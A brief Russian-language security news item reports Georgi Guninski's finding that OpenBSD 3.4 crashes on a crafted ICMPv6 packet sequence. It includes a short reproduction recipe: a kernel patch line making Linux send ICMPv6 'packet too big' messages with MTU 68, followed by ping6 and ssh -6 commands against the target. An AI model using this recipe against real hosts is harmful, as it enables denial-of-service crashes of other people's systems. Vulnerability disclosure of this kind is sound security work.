Знаменитый Georgi
Guninski докладывает про еще одну найденную
уязвимость. Openbsd 3.4 падает при получении
определенного ICMPv6 пакета. Для этого сначала
надо послать IPv6 пакет с малым MTU, а затем
добить ОС попыткой установки соединения.
Воспроизвести говорят так:
Исправить linux kernel 2.4.24 net/ipv6/icmp.c :
case ICMPV6_ECHO_REPLY:
/* we coulnd't care less */
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro
Затем
ping6 openbsd
ssh -6 openbsd
